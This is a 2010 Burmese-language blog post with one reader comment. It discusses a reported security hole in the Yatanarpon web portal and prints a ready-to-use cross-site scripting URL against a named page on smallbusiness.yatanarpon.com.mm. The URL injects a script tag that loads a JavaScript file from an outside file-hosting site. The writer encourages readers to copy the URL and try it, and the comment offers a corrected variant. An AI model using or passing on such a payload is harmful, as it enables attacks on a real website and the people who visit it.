Sunday, October 10, 2010
Hacker မဟုတ်ပါ။
ကဲ မိတ်ဆွေတို့ ရေ...မပြောလည်း မပြီး မပြီး မို့ လို့ ..အနော်လည်း နည်းနည်းတော့ ဖွင့်ချလိုက်ပါတယ်။
အဲဒါဘာလဲ ဆိုတော့  ၀ူး ခေါင်းခြောက်ရပြန်သကော။
ရတနာပုံဆိုဒ်ကြီးပေါက်နေခြင်းပါပဲ။ အဲဒါကို  တရားဝင် ဟက်ကာ တစ်ဦးဖြစ်သူ ကိုမင်းအောင် (BRB) ရဲ့ ဆိုဒ်မှာတော့  ဒီလိုလေး ဖေါ်ပြထားပါတယ်။
အောက်ပါလင့်ကို ၀င်ပါနော်။
[stextbox id="info" caption="http://www.planetcreator.net/2010/10/critical-sql-injection-in-yatanarpon-web-portal/"]http://www.planetcreator.net/2010/10/critical-sql-injection-in-yatanarpon-web-portal/[/stextbox]
ကိုဘီအာဘီဆိုဒ်ကတော့ ...ဟက်ကင်းလိုင်းလိုက်ချင်တဲ့ ညီငယ် ညီမငယ်တွေ အတွတ် တကယ်သင့်တော်တဲ့ ဆိုဒ်တစ်ခုပါ။
အဲဒီအတွတ် သွားရောက်လေ့ လာသင့်တယ်လို့ အကြံဥာဏ်ပေးလိုက်ပါတယ်။
အင်း... ဖြစ်ချင်တော့ ...ဒီနေ့ မနက် သူငယ်ချင်းတစ်ယောက်က ဒီကုတ်လေးတွေ ပေးတယ်ခင်ဗျ။
ဇူး စမ်းကြည့် တဲ့ ။ :D အနော်လည်း... ဘာကုတ်တုန်းဟ ဆိုပြီး စမ်းလိုက်မိပါတယ်။ အဲဒီတော့ ဘယ်လို ရလဒ် ထွက်လာသလဲဆိုတာကတော့ ..အောက်ပါပုံအတိုင်းပါ။
အဲဒီတော့ .. ဟိုက် သောက်ကျိုးနဲ ဆိုပြီး အနော်လည်း ဖြစ်သွားတယ်။ :D ပေးတဲ့ သူကလည်း ဟက်ကင်းလိုင်းမှာ လူမသိသူမသိ လျှောက်နေတဲ့ သူပါပဲ။
အဲဒီတော့  ၀ူး အနော်တော့ လေဒယ်။ ပြောချင်တာလေးက အနော် မဟက်ပါဘူး ဆိုတာပါပဲ :D ။ အနော် ဟက်ကာလည်း မဟုတ်ပါ။
ဘာပြသနာမှ မရှိပါဘူး။ ငဇူး အာမခံပါတယ်။ ပြီးရင်အောက်နည်းနည်း ဆင်းပြီး  Next Step ဆိုတာလေး ရှာကြည့် ပါ။တွေ့ ရင် နိပ်လိုက်ပါခင်ဗျား။
[stextbox id="black" caption="ဒီကုတ်တွေကို ကော်ပီလုပ်ပါ။"]http://smallbusiness.yatanarpon.com.mm/step2.php?dns=%22%3E%3Cscript%20src=http://centralupload.com/files/14927_t62fu/zu-xss.js%3E%3C/script%3E%3E
[/stextbox]
ဆိုဒ်တစ်ခု ပျက်တယ်ဆိုတာကတော့  စိတ်မကောင်းစရာပါ။သို့ ပေသော်ညားလည်း...စမ်းချင်သူများ ဗဟုသုတအနေနဲ့ အနော်တင်ပေးလိုက်ပါတယ်။
ကို ဘီအာဘီကိုတော့ ခွင့်တောင်းထားတယ်ခင်ဗျ။ တော် ကြာ ငဇူး နင်နော်။ ဆိုပြီး လာကစ်တွားလို့  :D ။ သူနဲ ကလည်း စကားမပြောဖြစ်တာကြာပြီ။
အနော်ဆိုဒ်က ဘာဆိုဒ်မှန်းမသိတော့ လို့  သူလည်း စကားမပြောတော့ ပုံပေါက်တယ်။ :P
ပြောချင်တာလေးကတော့ ဒါပါပဲခင်ဗျား။
လေးစားစွာဖြင့်
ငဇူး
1 comment:
  1. ကုတ်တွေ မှားနေတယ် ထင်တယ်ဗျ...
    [code]http://smallbusiness.yatanarpon.com.mm/step2.php?dns=">>[/code]
    အဲတာမှ အမှန်ထင်တယ်ဘဲဗျ...့သူကလည်း ဟက်ကင်းလိုင်းမှာ လူမသိသူမသိ လျှောက်နေတဲ့ သူပါပဲ။ အဲတာ ဘူရဲဟ..ဗမာဟက်ကာ ဆိုတာလဲ နည်းမှ မနည်းတာ..
    cmd မှာ command လေးရိုက်တတ်ရုံ နဲ့ စိတ်ကြီးဝင်နေတဲ့ သူတွေ လည်းနည်းမှ မနည်းတာကိုး
    ReplyDelete